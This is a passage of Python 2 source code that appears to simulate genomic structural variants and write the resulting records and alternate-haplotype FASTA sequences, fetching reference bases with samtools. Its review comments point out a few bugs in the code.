            for k3 in range(len(SVtemp_a)):
                for k4 in SVtemp_b[k3]:
                    sv_reorganize[k1][start][k2].append(SVtemp_a[k3]+[k4])
    for k1 in chromos:
        if k1 in sv_reorganize.keys():
            for k2 in sorted(sv_reorganize[k1].keys()):
                for k3 in sorted(sv_reorganize[k1][k2].keys()):
                    for k4 in sv_reorganize[k1][k2][k3]:
                        # k4[3] is the REF column; resolve placeholder 'N'
                        if k4[3]=='N':
                            k4[3]=ref_base_returnN(ref,k4[0],k4[1])
                        print >>fo, '\t'.join([str(i) for i in k4])
    fo.close()
def simple_flag_SA(k1,k2):
    """Classify rearranged structure *k2* against reference structure *k1*.

    k1/k2 are letter strings where each letter is a genomic block and a
    trailing '^' marks an inverted block (e.g. 'ab^c').
    Returns [outdel, outinv, outdup2, outtra]:
      outdel  - letters deleted from k1
      outinv  - inverted units (stripped of '^')
      outdup2 - [unit, copy-count] pairs for duplicated units
      outtra  - 1 if any blocks appear out of ascending order (translocation)
    """
    temp=[]
    break_flag=0    # NOTE(review): never used below
    # group each letter with its trailing '^' marker
    for i in k2:
        if not i=='^':
            temp.append(i)
        else:
            temp[-1]+=i
    # merge runs of consecutive letters (and reverse-consecutive inverted runs)
    temp2=[temp[0]]
    for i in range(len(temp[1:])):
        if not '^' in temp[i] and not '^' in temp[i+1] and ord(temp[i+1])-ord(temp[i])==1:
            temp2[-1]+=temp[i+1]
        elif '^' in temp[i] and '^' in temp[i+1] and ord(temp[i+1][0])-ord(temp[i][0])==-1:
            # inverted blocks run backwards, so prepend to keep reference order
            temp2[-1]=temp[i+1][0]+temp2[-1]
        else:
            temp2.append(temp[i+1])
    outdel=[]
    outinv=[]
    outdup=[]
    outtra=0
    # collect inverted units, then drop the '^' marks for the ordering checks
    for i in range(len(temp2)):
        j=temp2[i]
        if '^' in j:
            if not j.replace('^','') in outinv:
                outinv.append(j.replace('^',''))
            temp2[i]=j.replace('^','')
    temp3=''.join(temp2)
    # any descending adjacent pair means blocks were reordered (translocation)
    for i in range(len(temp3)-1):
        if ord(temp3[i+1])-ord(temp3[i])<0:
            outtra=1
    if not temp3==k1:
        # temp4 = first occurrence of each letter; extra occurrences are dups
        temp4=[]
        for i in temp3:
            if temp3.count(i)>1:
                if not i in outdup:
                    outdup.append(i)
            if not i in temp4:
                temp4.append(i)
        if not ''.join(temp4)==k1:
            for i in k1:
                if not i in temp4:
                    outdel.append(i)
    if not outdup==[]:
        # expand duplicated letters into candidate multi-letter units
        dupuni=unit_produce(outdup)
        outdup2=[]
        k3=k2
        for i in dupuni:
            ia=i
            # ib is the inverted spelling of the unit (reversed, each letter '^'-marked)
            ib=''.join([j+'^' for j in i[::-1]])
            if len(i)>1:
                if temp2.count(ia)+temp2.count(ib)>1:
                    outdup2.append([i,temp2.count(ia)+temp2.count(ib)])
                    # remove counted copies so shorter sub-units are not re-counted
                    k3=k3.replace(ia,'')
                    k3=k3.replace(ib,'')
            elif len(i)==1:
                if k3.count(ia)+k3.count(ib)>1:
                    # NOTE(review): unlike the multi-letter branch, the inverted
                    # copies (ib) are not included in the reported count — confirm
                    outdup2.append([i,k3.count(ia)])
                    k3=k3.replace(ia,'')
                    k3=k3.replace(ib,'')
    else:
        outdup2=[]
    return [outdel,outinv,outdup2,outtra]
def add_csv_info(csv1,flag_sex,k1,k2):
    """Record the components of a complex SV (csv1) on one haplotype.

    csv1 = [del_letters, inv_letters, dup_units, tra_flag] as returned by
    simple_flag_SA.  flag_sex selects which haplotype slot the letters go
    into; the other slot is left empty.  Delegates to the *_info_add
    helpers for every breakpoint record in sv_info[k1][k2] (globals).
    """
    #flag_sex=1: Maternal
    #flag_sex=2: Paternal
    if flag_sex==1:
        del_let=[csv1[0],[]]
        inv_let=[csv1[1],[]]
        dup_let=[csv1[2],[]]
    else:
        del_let=[[],csv1[0]]
        inv_let=[[],csv1[1]]
        dup_let=[[],csv1[2]]
    for k3 in sv_info[k1][k2]:
        del_info_add(k3,del_let)
        inv_info_add(k3,inv_let)
        dup_info_2_add(k3,dup_let)
    if csv1[3]==1:
        # tra_info_add is defined elsewhere in this file
        tra_info_add(k1,k2)
def del_info_add(k3,del_let):
    """Append deletion intervals from record *k3* to the global ``del1``.

    del_let = [hap1_letters, hap2_letters].  Intervals present on both
    haplotypes are recorded once as 'hom'; haplotype-specific ones as
    'heta'/'hetb'.  Each del1 entry is keyed by chromosome and carries
    [start, end, zygosity, score, breakpoint-id].
    """
    tempa=bp_to_hash(k3[:-1],del_let[0])
    tempb=bp_to_hash(k3[:-1],del_let[1])
    for k1 in tempa:
        if k1 in tempb:
            tempc='hom'
            # consume the matching hap2 interval so it is not re-emitted below
            tempb.remove(k1)
        else:
            tempc='heta'
        if not k1[0] in del1.keys():
            del1[k1[0]]=[]
        del1[k1[0]].append(k1[1:]+[tempc,k3[-1],'_'.join(k3[:-1])])
    # whatever is left in tempb is exclusive to haplotype 2
    for k1 in tempb:
        if not k1[0] in del1.keys():
            del1[k1[0]]=[]
        del1[k1[0]].append(k1[1:]+['hetb',k3[-1],'_'.join(k3[:-1])])
def dup_info_add(k3,dup_let):
    """Append duplication intervals from record *k3* to the global ``dup1``.

    dup_let holds one list of duplicated letter-units per haplotype.
    NOTE(review): the copy-count expression ``k2a.count(k4)`` references a
    name ``k2a`` that is not defined in this function — it appears to rely
    on a variable leaked from another scope and would raise NameError if
    none exists at call time; confirm before relying on this function.
    """
    #dup_let=[k2i,k2j]
    for k2x in dup_let:
        for k4 in k2x:
            temp=bp_to_hash(k3[:-1],[i for i in k4])
            for k5 in temp:
                if not k5[0] in dup1.keys():
                    dup1[k5[0]]=[]
                dup1[k5[0]].append(k5[1:]+[k3[-1],'_'.join(k3[:-1]),k2a.count(k4)])
def dup_info_2_add(k3,dup_let):
    """Append duplication intervals with explicit copy counts to global ``dup1``.

    dup_let = [hap1_units, hap2_units] where each unit is [letters, count];
    only units with count > 1 are recorded, tagged 'heta'/'hetb' by haplotype.
    """
    temprec=-1
    for k2x in dup_let:
        temprec+=1
        hetx=['heta','hetb'][temprec]
        for k4 in k2x:
            # k4[0] = letter unit, k4[1] = copy count
            temp=bp_to_hash(k3[:-1],[i for i in k4[0]])
            for k5 in temp:
                if not k5[0] in dup1.keys():
                    dup1[k5[0]]=[]
                if k4[1]>1:
                    dup1[k5[0]].append(k5[1:]+[hetx,k3[-1],'_'.join(k3[:-1]),k4[1]])
def inv_info_add(k3,inv_let):
    """Append inversion intervals from record *k3* to the global ``inv1``.

    inv_let = [hap1_units, hap2_units]; entries are tagged 'heta'/'hetb'
    according to which haplotype list they came from.
    """
    #inv_let=[k2m,k2n]
    temprec=-1
    for k2x in inv_let:
        temprec+=1
        hetx=['heta','hetb'][temprec]
        for k4 in k2x:
            temp=bp_to_hash(k3[:-1],[i for i in k4])
            for k5 in temp:
                if not k5[0] in inv1.keys():
                    inv1[k5[0]]=[]
                inv1[k5[0]].append(k5[1:]+[hetx,k3[-1],'_'.join(k3[:-1])])
def let_reclust(vec_in):
    """Merge adjacent block letters of *vec_in* into contiguous units.

    vec_in is a list of single letters, each optionally suffixed with '^'
    (inverted block).  Consecutive forward letters merge into one unit
    ('a','b' -> 'ab'); consecutive inverted letters running backwards merge
    and are re-emitted in forward order with a single trailing '^'
    ('b^','a^' -> 'ab^').  Returns the list of merged units.

    Fix: uses floor division (``//``) so the 60/2-style index arithmetic is
    identical under Python 2 and Python 3 (the original ``/`` relied on
    Python 2 integer division).
    """
    if vec_in==[]:
        return []
    else:
        k2e=[vec_in[0]]
        for k3 in range(len(vec_in)-1):
            if '^' in vec_in[k3+1]:
                # inverted blocks appear in descending letter order when adjacent
                if '^' in vec_in[k3] and ord(vec_in[k3][0])-ord(vec_in[k3+1][0])==1:
                    k2e[-1]+=vec_in[k3+1]
                else:
                    k2e.append(vec_in[k3+1])
            else:
                if ord(vec_in[k3+1][0])-ord(vec_in[k3][0])==1 and not '^' in vec_in[k3]:
                    k2e[-1]+=vec_in[k3+1]
                else:
                    k2e.append(vec_in[k3+1])
        k2f=[]
        for k3 in k2e:
            if '^' in k3:
                # k3 is like 'b^a^': take every other char, reverse, add one '^'
                k5=''
                for k4 in range(len(k3)//2):
                    k5+=k3[2*k4]
                k6=k5[::-1]+'^'
                if not k6 in k2f:
                    k2f.append(k6)
            else:
                k2f.append(k3)
        return k2f
def dup_let_recombind(vec_in):
    """Group sorted letters into consecutive runs and emit candidate units.

    A single isolated letter yields itself; a run of consecutive letters
    yields every contiguous sub-run of length >= 2, shortest widths first
    (e.g. ['a','b','c'] -> ['ab','bc','abc']).
    """
    if vec_in==[]:
        return []
    letters=sorted(vec_in)
    # split into maximal runs of alphabet-consecutive letters
    runs=[[letters[0]]]
    for ch in letters[1:]:
        if ord(ch)-ord(runs[-1][-1])==1:
            runs[-1].append(ch)
        else:
            runs.append([ch])
    pieces=[]
    for run in runs:
        if len(run)==1:
            pieces.append(run)
            continue
        for width in range(2,len(run)+1):
            for anchor in run[:(1-width)]:
                offset=run.index(anchor)
                pieces.append(run[offset:offset+width])
    return [''.join(piece) for piece in pieces]
def comp_info_reorganize(k1,k2):
    """Decompose a complex SV genotype *k2* against reference structure *k1*.

    k1 and k2 are 'hap1/hap2' letter strings ('^' marks inversion).  Derives
    per-haplotype deletion, duplication and inversion letter sets and feeds
    every breakpoint record in the global sv_info[k1][k2] to del_info_add /
    dup_info_add / inv_info_add.
    """
    del_let=[[],[]]
    dup_let=[[],[]]
    inv_let=[[],[]]
    tra_let=[[],[]]
    k2a=k2.split('/')[0]
    k2b=k2.split('/')[1]
    # k2c/k2d: per-haplotype letters with their '^' markers attached
    k2c=[]
    k2d=[]
    for k3 in k2a:
        if not k3=='^':
            k2c.append(k3)
        else:
            k2c[-1]+=k3
    for k3 in k2b:
        if not k3=='^':
            k2d.append(k3)
        else:
            k2d[-1]+=k3
    # classify each reference letter: absent -> deletion, repeated -> duplication
    for k3 in k1.split('/')[0]:
        if k2a.count(k3)==0:
            del_let[0].append(k3)
        if k2b.count(k3)==0:
            del_let[1].append(k3)
        if k2a.count(k3)>1:
            dup_let[0].append(k3)
        if k2b.count(k3)>1:
            dup_let[1].append(k3)
    k2e=let_reclust(k2c)
    k2f=let_reclust(k2d)
    k2g=dup_let_recombind(dup_let[0])
    k2h=dup_let_recombind(dup_let[1])
    k2i=[]
    #integreated dup sections
    k2j=[]
    #integreated dup sections
    # keep a candidate dup unit only if it occurs inside >1 merged segment
    for k3 in k2g:
        flag1=0
        for k4 in k2e:
            if k3 in k4:
                flag1+=1
        if flag1>1:
            k2i.append(k3)
    # also keep single duplicated letters that stand alone as a segment
    for k3 in dup_let[0]:
        if k2e.count(k3[0])+k2e.count(k3[0]+'^')>0:
            if not k3[0] in k2i:
                k2i.append(k3[0])
    for k3 in k2h:
        flag1=0
        for k4 in k2e:
            if k3 in k4:
                flag1+=1
        if flag1>1:
            k2j.append(k3)
    for k3 in dup_let[1]:
        if k2e.count(k3[0])+k2e.count(k3[0]+'^')>0:
            if not k3[0] in k2j:
                k2j.append(k3[0])
    # inverted segments end with '^' after let_reclust
    k2m=[]
    for k3 in k2e:
        if k3[-1]=='^':
            k2m.append(k3)
    k2n=[]
    for k3 in k2f:
        if k3[-1]=='^':
            k2n.append(k3)
    for k3 in sv_info[k1][k2]:
        del_info_add(k3,del_let)
        dup_info_add(k3,[k2i,k2j])
        inv_info_add(k3,[k2m,k2n])
def bp_to_hash(bp_list,sv_let):
    """Map block letters back to genomic intervals.

    bp_list mixes chromosome names and breakpoint coordinates, e.g.
    ['chr1','100','200','300']; consecutive coordinate pairs become blocks
    'a','b',... in order.  sv_let selects blocks (only the first character
    of each entry is used, so '^' marks are ignored); runs of consecutive
    letters on the same chromosome are merged into one interval.
    Returns [[chrom, start, end], ...].  Uses the global ``chromos`` to
    recognize chromosome names.
    """
    bp_hash={}
    block_rec=0
    block_hash=[]
    sv_let=[i[0] for i in sv_let]
    # split bp_list into per-chromosome groups of coordinates
    for a3 in bp_list:
        if a3 in chromos or not a3.isdigit():
            block_hash.append([a3])
        else:
            block_hash[-1].append(a3)
    # assign letters 'a','b',... to each adjacent coordinate pair
    for a3 in block_hash:
        for a4 in range(len(a3)-2):
            bp_hash[chr(97+block_rec)]=[a3[0],a3[a4+1],a3[a4+2]]
            block_rec+=1
    out=[]
    if not sv_let==[]:
        if len(sv_let)==1:
            out=[bp_hash[sv_let[0]]]
        else:
            out.append(bp_hash[sv_let[0]])
            for ka in range(len(sv_let)-1):
                # merge alphabet-consecutive letters on the same chromosome
                if ord(sv_let[ka+1])-ord(sv_let[ka])==1 and bp_hash[sv_let[ka+1]][0]==bp_hash[sv_let[ka]][0]:
                    out[-1]+=bp_hash[sv_let[ka+1]][1:]
                else:
                    out.append(bp_hash[sv_let[ka+1]])
    out2=[]
    for ka in out:
        # collapse each merged run to [chrom, first_start, last_end]
        out2.append([ka[0],int(ka[1]),int(ka[-1])])
    return out2
def sv_homo_initial():
    """Reset the global sv_homo_info table with one empty bucket per SV type."""
    for sv_type in ('DEL','DUP','INV','TRA'):
        sv_homo_info[sv_type]=[]
def produce_keys(key):
    """Return [ref_allele, alt_allele] genotype templates for SV type *key*.

    DEL -> deletion of block 'a'; DUP -> 2-19 tandem copies of 'a' (random);
    INV -> inverted 'a'; TRA -> swapped blocks 'a','b'.
    """
    if key=='DEL':
        ref_allele,alt_allele='a/a','/'
    elif key=='DUP':
        # random tandem copy number in [2, 19]
        copies=random.sample(range(2,20),1)[0]
        dup_block='a'*copies
        ref_allele,alt_allele='a/a','/'.join([dup_block,dup_block])
    elif key=='INV':
        ref_allele,alt_allele='a/a','a^/a^'
    elif key=='TRA':
        ref_allele,alt_allele='ab/ab','ba/ba'
    return [ref_allele,alt_allele]
def sv_homo_produce():
    """Attach genotype templates to every picked SV region.

    For each region [chrom, start, end(, end2), sv_type] in the global
    SV_region, appends region + produce_keys(sv_type) to the global
    sv_homo_info bucket for that type.  (The original computed an unused
    ``sv_len`` local; removed.)
    """
    for k1 in SV_region:
        k2=k1[-1]
        sv_homo_info[k2].append(k1+produce_keys(k2))
def sv_het_produce():
    """Derive heterozygous records from the global sv_homo_info.

    For each homozygous record, randomly assigns the reference allele to one
    haplotype and the alternate allele to the other (in place), and appends
    the record to the global sv_het_info bucket of the same SV type.
    """
    for sv_type in sv_homo_info.keys():
        sv_het_info[sv_type]=[]
        for rec in sv_homo_info[sv_type]:
            allele=random.choice(range(2))
            # rec[-2]='ref/ref', rec[-1]='alt/alt'; take one haplotype of each
            pool=[rec[-2].split('/')[0],rec[-1].split('/')[0]]
            rec[-1]='/'.join([pool[allele],pool[1-allele]])
            sv_het_info[sv_type].append(rec)
def sv_rec_homo_produce():
    """Write every homozygous SV record to '<prefix>.homo.<TYPE>.rec'.

    One space-joined line per record.  Uses globals sv_homo_info and
    dict_opts ('--output-prefix').
    """
    for k1 in sv_homo_info.keys():
        fo=open(dict_opts['--output-prefix']+'.homo.'+k1+'.rec','w')
        print dict_opts['--output-prefix']+'.homo.'+k1+'.rec'
        for k2 in sv_homo_info[k1]:
            print >>fo, ' '.join([str(i) for i in k2])
        fo.close()
def sv_rec_het_produce():
    """Write every heterozygous SV record to '<prefix>.het.<TYPE>.rec'.

    One space-joined line per record.  Uses globals sv_het_info and
    dict_opts ('--output-prefix').
    """
    for k1 in sv_het_info.keys():
        fo=open(dict_opts['--output-prefix']+'.het.'+k1+'.rec','w')
        print dict_opts['--output-prefix']+'.het.'+k1+'.rec'
        for k2 in sv_het_info[k1]:
            print >>fo, ' '.join([str(i) for i in k2])
        fo.close()
def sv_info_rewrite(sv_h_info):
    """Re-key simulated SV records into the global sv_info table.

    sv_info[ref_genotype][alt_genotype] collects, per record, the leading
    fields stringified plus a trailing 0.0 score placeholder.
    """
    for sv_type in sv_h_info.keys():
        for rec in sv_h_info[sv_type]:
            ref_key=rec[-2]
            alt_key=rec[-1]
            sv_info.setdefault(ref_key,{}).setdefault(alt_key,[])
            sv_info[ref_key][alt_key].append([str(i) for i in rec[:-3]]+[0.0])
def sv_stat_calcu(sv_hash,key):
    """Split each [count, min_size, max_size] entry under *key* into size tertiles.

    Returns [[count, min, min+third, max-third, max], ...] where
    third = (max - min) // 3.  Floor division keeps the result identical
    under Python 2 and Python 3 (the original ``/`` relied on Python 2
    integer division).
    """
    out=[]
    for k1 in sv_hash[key]:
        sv_min=int(k1[1])
        sv_max=int(k1[2])
        sv_int=(sv_max-sv_min)//3
        out.append([k1[0],sv_min,sv_min+sv_int, sv_max-sv_int,sv_max])
    return out
def sv_size_pick(sv_stat):
    """Draw random SV sizes from each stat row [count, b0, b1, b2, b3].

    Per row: count//3 sizes from [b0,b1), half the remainder from [b1,b2),
    and the rest from [b2,b3).  Returns the sizes in random order.

    Bug fix: the original computed ``permute=random.sample(out,len(out))``
    but returned the unshuffled ``out``; the shuffled list is now returned
    as intended.  Floor division replaces Python-2-only integer ``/``.
    """
    out=[]
    for k1 in sv_stat:
        total=int(k1[0])
        low_n=total//3                 # first size band
        mid_n=(total-low_n)//2         # half of the remainder
        high_n=total-low_n-mid_n       # whatever is left
        out+=[random.choice(range(int(k1[1]),int(k1[2]))) for i in range(low_n)]
        out+=[random.choice(range(int(k1[2]),int(k1[3]))) for i in range(mid_n)]
        out+=[random.choice(range(int(k1[3]),int(k1[4]))) for i in range(high_n)]
    # return the shuffled sizes (previously computed and discarded)
    return random.sample(out,len(out))
def chromos_readin(refs):
    """Read '<refs>.fai' and allocate per-chromosome SV counts.

    Each .fai line is '<name> <length> ...'.  Every chromosome gets a share
    of the global ``sv_total_num`` proportional to its length; chromosomes
    allotted <= 1 region are dropped from the output.

    Returns [genome_length, kept_chromos, regions_per_chromo,
    length_by_chromo(dict)].  (The original also built an unused
    ``chrom_to_remove`` list; removed.)
    """
    fin=open(refs+'.fai')
    chromos=[]
    chromo_length=[]
    genome_length=0
    for line in fin:
        pin=line.strip().split()
        chromos.append(pin[0])
        genome_length+=int(pin[1])
        chromo_length.append(int(pin[1]))
    fin.close()
    chromo_num_region=[]
    for k1 in chromo_length:
        # proportional share of the total number of simulated SVs
        chromo_num_region.append(int(round(float(k1)/float(genome_length)*sv_total_num)))
    out_num_region=[]
    out_chromos=[]
    out_length={}
    for i in range(len(chromo_num_region)):
        if chromo_num_region[i]>1:
            out_chromos.append(chromos[i])
            out_num_region.append(chromo_num_region[i])
            out_length[chromos[i]]=chromo_length[i]
    return [genome_length]+[out_chromos]+[out_num_region]+[out_length]
def sv_hash_add(list_in,key):
    """Record *key* under every size value of *list_in* in the global sv_hash."""
    for size in list_in:
        sv_hash.setdefault(size,[]).append(key)
def sv_region_pick():
    """Pick non-overlapping random regions across the genome for each SV.

    Uses globals: chromos, chromo_num_region, chromo_length (dict),
    del_size/dup_size/inv_size/tra_size (size pools) and sv_hash
    (size -> list of SV types, consumed as sizes are assigned).
    Returns SV_region entries [chrom, start, end(, end2), sv_type]; the
    extra end2 is only present for 'TRA'.
    """
    #pick random regions across the genome
    SV_region=[]
    rec=-1
    sv_size=del_size+dup_size+inv_size+tra_size
    sv_size=random.sample(sv_size,len(sv_size))
    for k1 in range(len(chromos)):
        chromosome=chromos[k1]
        num_region=chromo_num_region[k1]
        range_region=chromo_length[chromosome]
        # candidate anchor points, 1kb away from chromosome ends
        temp_start_region=sorted(random.sample(range(1000, range_region-1000),num_region+1))
        temp_end_region=[]
        for k2 in range(num_region):
            start=temp_start_region[k2]
            start2=temp_start_region[k2+1]
            # skip windows too small to host an SV
            if start2-start<1000: continue
            rec+=1
            temp_sv_size=sv_size[rec]
            # look up (and consume) the SV type assigned to this size
            sv_type=sv_hash[sv_size[rec]][0]
            del sv_hash[sv_size[rec]][0]
            end=start+temp_sv_size
            # if the SV would run into the next window, shrink it
            if not end<start2-300:
                end=random.choice(range(start,int(numpy.mean([start,start2]))))
            if sv_type=='TRA':
                # translocations need a second breakpoint downstream
                end2=random.choice(range(end+100,start2-100))
            temp_end_region.append(end)
            if sv_type=='TRA':
                SV_region.append([chromos[k1],start,end,end2,sv_type])
            else:
                SV_region.append([chromos[k1],start,end,sv_type])
    return SV_region
def ref_base_returnN(ref,chromo,pos):
    """Stub REF-base lookup: always returns 'N'.

    Drop-in placeholder for ref_base_readin (below) that avoids a samtools
    call per VCF record; arguments are accepted but ignored.
    """
    return 'N'
def ref_base_readin(ref,chromo,pos):
    """Fetch the reference base at chromo:pos via ``samtools faidx``.

    Returns the base as a one-character string, or 'N' when samtools
    produces no sequence line (e.g. position out of range).
    """
    pipe=os.popen(r'''samtools faidx %s %s:%s-%s'''%(ref,chromo,str(pos),str(pos)))
    pipe.readline()                         # discard the FASTA header line
    base_fields=pipe.readline().strip().split()
    if base_fields==[]:
        return 'N'
    return base_fields[0]
def del_flag_SA(k1,k2):
    """Return 1 when alt structure *k2* is a pure deletion of ref structure *k1*.

    A pure deletion has no inverted blocks ('^'), no duplicated letters,
    strictly ascending block order, and differs from the reference; every
    other case returns 0.
    """
    if '^' in k2:
        return 0
    if any(k2.count(letter)>1 for letter in k2):
        return 0
    for left,right in zip(k2,k2[1:]):
        if ord(right)-ord(left)<1:
            return 0
    if k1==k2:
        return 0
    return 1
def order_SV_Homo_write(sv_info):
    """Index homozygous SVs into the global order_SV_Pos by chromosome and start.

    Each entry is [[chrom, int coords...], [alt_hap1_letters]] so the fasta
    writers can stitch sequence in positional order.
    """
    for ref_key in sv_info.keys():
        for alt_key in sv_info[ref_key].keys():
            for rec in sv_info[ref_key][alt_key]:
                chrom=rec[0]
                start=int(rec[1])
                order_SV_Pos.setdefault(chrom,{}).setdefault(start,[])
                order_SV_Pos[chrom][start].append([[chrom]+[int(i) for i in rec[1:-1]],[alt_key.split('/')[0]]])
def order_SV_Het_write(sv_info):
    """Index heterozygous SVs into the global order_SV_Pos by chromosome and start.

    Each entry is [[chrom, int coords...], [hap1, hap2, ref_hap]] so the
    fasta writers can compare each haplotype allele against the reference.
    """
    for ref_key in sv_info.keys():
        for alt_key in sv_info[ref_key].keys():
            for rec in sv_info[ref_key][alt_key]:
                chrom=rec[0]
                start=int(rec[1])
                order_SV_Pos.setdefault(chrom,{}).setdefault(start,[])
                alleles=alt_key.split('/')
                order_SV_Pos[chrom][start].append([[chrom]+[int(i) for i in rec[1:-1]],[alleles[0],alleles[1],ref_key.split('/')[0]]])
def order_SV_Comp_write(sv_info):
    """Dump every complex-SV record to '<prefix>.comp.CSV.rec'.

    One space-joined line per record: the record fields followed by the
    ref and alt genotype strings.  Uses the global dict_opts.
    """
    fo=open(dict_opts['--output-prefix']+'.comp.CSV.rec','w')
    rec=0
    for k1 in sv_info.keys():
        for k2 in sv_info[k1].keys():
            for k3 in sv_info[k1][k2]:
                rec+=1
                print >>fo, ' '.join([str(i) for i in k3+[k1,k2]])
    fo.close()
def Ref_Alt_Produce(ChromoList,bp_list,letter_new,Ref_Seq_File):
    """Build the alternate-allele sequence described by *letter_new*.

    bp_list mixes chromosome names (members of ChromoList) and breakpoint
    coordinates; adjacent coordinate pairs become blocks 'a','b',... whose
    sequences are fetched with ``samtools faidx``.  letter_new spells the
    rearranged allele ('^' suffix = reverse complement of that block).

    NOTE(review): this definition is overridden by a later
    ``def Ref_Alt_Produce`` in the same file, so this version is dead code
    at runtime (the later one also appends micro-insertions).
    """
    #Chromo=Chr, target chromosome
    #BamN: DG187, DG196... name of sample
    #eg of bp_list:[184569179, 184569775, 184571064, 184572009, 184572016]
    #Eg of flank: flank : 446
    if letter_new=='':
        return ''
    else:
        bp_hash={}
        bp_seq=[]
        # group coordinates under their chromosome name
        for k1 in bp_list:
            if k1 in ChromoList:
                bp_seq.append([k1])
            else:
                bp_seq[-1].append(k1)
        rec=0
        # label every adjacent coordinate pair 'a','b',...
        for k1 in bp_seq:
            for k2 in range(len(k1)-2):
                rec+=1
                bp_hash[chr(96+rec)]=[k1[0],k1[k2+1],k1[k2+2]]
        letter_seq={}
        for k1 in bp_hash.keys():
            Chromo=bp_hash[k1][0]
            region_left=bp_hash[k1][1]
            region_right=bp_hash[k1][2]
            seq=os.popen(r'''samtools faidx %s %s:%d-%d'''%(Ref_Seq_File,Chromo,region_left,region_right))
            seq.readline().strip().split()
            lines=[]
            while True:
                line=seq.readline().strip().split()
                if not line: break
                lines.append(line)
            Seq1=lines[0][0]
            for j in range(len(lines))[1:]:
                Seq1=''.join([Seq1,lines[j][0]])
            letter_seq[k1]=Seq1
            # '<letter>^' maps to the reverse complement of the block
            letter_seq[k1+'^']=reverse(complementary(Seq1))
        new_Seq=''
        new_letter=[]
        # re-attach '^' markers to their letters, then concatenate block sequences
        for k1 in letter_new:
            if not k1=='^':
                new_letter.append(k1)
            else:
                new_letter[-1]+=k1
        for k1 in new_letter:
            new_Seq+=letter_seq[k1]
        return new_Seq
def Ref_Ref_Produce(Chromo,bp_list,Ref_Seq_File):
    """Return the reference sequence of Chromo:bp_list[0]-bp_list[-1].

    Fetches the region with ``samtools faidx`` and concatenates the
    sequence lines (skipping the FASTA header).
    """
    start=int(bp_list[0])
    end=int(bp_list[-1])
    fin=os.popen(r'''samtools faidx %s %s:%d-%d'''%(Ref_Seq_File, Chromo, start,end))
    fin.readline()                        # FASTA header line
    chunks=[]
    for line in fin:
        chunks.append(line.strip().split()[0])
    fin.close()
    return ''.join(chunks)
def reverse(seq):
    """Return *seq* in reverse order as a new string."""
    return seq[::-1]
def complementary(seq):
    """Return the DNA complement of *seq*, preserving case.

    Characters outside ATGCN/atgcn are silently dropped (matching the
    original behaviour).
    """
    pairs={'A':'T','T':'A','G':'C','C':'G','N':'N',
           'a':'t','t':'a','g':'c','c':'g','n':'n'}
    return ''.join(pairs[ch] for ch in seq if ch in pairs)
def unit_produce(list):
    """Expand sorted letters into every contiguous sub-run, longest first.

    e.g. ['a','b','d'] -> ['d','ab','b','a'].  Consecutive letters are first
    merged into maximal runs; then every contiguous slice of each run is
    emitted and the whole result is reversed.

    The parameter name ``list`` (which shadows the builtin) is kept for
    interface compatibility; internally the sorted copy is bound once
    instead of being recomputed.
    """
    letters=sorted(list)
    runs=[letters[0]]
    for ch in letters[1:]:
        if ord(ch)-ord(runs[-1][-1])==1:
            runs[-1]+=ch
        else:
            runs.append(ch)
    units=[]
    for run in runs:
        for width in range(1,len(run)+1):
            for offset in range(len(run)-width+1):
                units.append(run[offset:offset+width])
    return units[::-1]
def fasta_homo_write(fasta_out):
    """Write the homozygous simulated genome to *fasta_out* (single fasta).

    Per chromosome, alternates reference segments with alternate-allele
    segments from the global order_SV_Pos, then wraps at 60 bp per line.
    Uses globals: chromos, order_SV_Pos, chromo_length, ref.

    NOTE(review): the line-wrapping loops reuse the chromosome loop
    variable ``k1`` (harmless, since the for statement rebinds it), and
    rely on ``k1`` surviving the wrap loop — a chromosome sequence shorter
    than 60 bp would leave ``k1`` unbound and raise NameError; confirm
    inputs always exceed 60 bp.
    """
    fo=open(fasta_out,'w')
    print fasta_out
    for k1 in chromos:
        print >>fo, '>'+k1
        new1_ref=''
        rec1_start=0
        for k2 in sorted(order_SV_Pos[k1].keys()):
            # reference gap between the previous SV (or start) and this SV
            rec1_start+=1
            k3=order_SV_Pos[k1][k2]
            start=int(k3[0][0][1])
            end=int(k3[0][0][-1])
            new1_ref+=Ref_Ref_Produce(k1,[rec1_start,start-1],ref)
            new1_ref+=Ref_Alt_Produce(chromos,k3[0][0],k3[0][1][0],ref)
            rec1_start=end
        # trailing reference segment to the chromosome end
        rec1_start+=1
        new1_ref+=Ref_Ref_Produce(k1,[rec1_start,chromo_length[k1]],ref)
        # wrap at 60 characters per FASTA line
        new1_seq=[]
        for k1 in range(len(new1_ref)/60):
            new1_seq.append(new1_ref[k1*60:(k1+1)*60])
        new1_seq.append(new1_ref[(k1+1)*60:])
        for k1 in new1_seq:
            if not k1=='':
                print >>fo, k1
    fo.close()
def fasta_het_write_a(fasta_out):
    """Write haplotype 1 of the heterozygous simulated genome ('.het1.fa').

    Mirrors fasta_het_write_b (haplotype 2); the commented-out lines are the
    haplotype-2 code retained for reference.  For each SV, the alternate
    sequence is emitted only when haplotype 1's allele differs from the
    reference allele.  Uses globals: chromos, order_SV_Pos, chromo_length, ref.
    """
    fo1=open(fasta_out.replace('.het.fa','.het1.fa'),'w')
    #fo2=open(fasta_out.replace('.het.fa','.het2.fa'),'w')
    fo1.close()
    #fo2.close()
    print fasta_out.replace('.het.fa','.het1.fa')
    #print fasta_out.replace('.het.fa','.het2.fa')
    for k1 in chromos:
        fo1=open(fasta_out.replace('.het.fa','.het1.fa'),'a')
        #fo2=open(fasta_out.replace('.het.fa','.het2.fa'),'a')
        print >>fo1, '>'+k1
        #print >>fo2, '>'+k1
        new1_ref=''
        rec1_start=0
        #new2_ref=''
        #rec2_start=0
        for k2 in sorted(order_SV_Pos[k1].keys()):
            print [k1,k2]
            # reference gap between the previous SV (or start) and this SV
            rec1_start+=1
            k3=order_SV_Pos[k1][k2]
            start=int(k3[0][0][1])
            end=int(k3[0][0][-1])
            new1_ref+=Ref_Ref_Produce(k1,[rec1_start,start-1],ref)
            # k3[0][1] = [hap1, hap2, ref]; alt sequence only if hap1 != ref
            if not k3[0][1][0]==k3[0][1][2]:
                new1_ref+=Ref_Alt_Produce(chromos,k3[0][0],k3[0][1][0],ref)
            else:
                new1_ref+=Ref_Ref_Produce(k1,[start,end],ref)
            rec1_start=end
            #rec2_start+=1
            #new2_ref+=Ref_Ref_Produce(k1,[rec2_start,start-1],ref)
            #if not k3[0][1][1]==k3[0][1][2]:
            #    new2_ref+=Ref_Alt_Produce(chromos,k3[0][0],k3[0][1][1],ref)
            #else:
            #    new2_ref+=Ref_Ref_Produce(k1,[start,end],ref)
            #rec2_start=end
        # trailing reference segment to the chromosome end
        rec1_start+=1
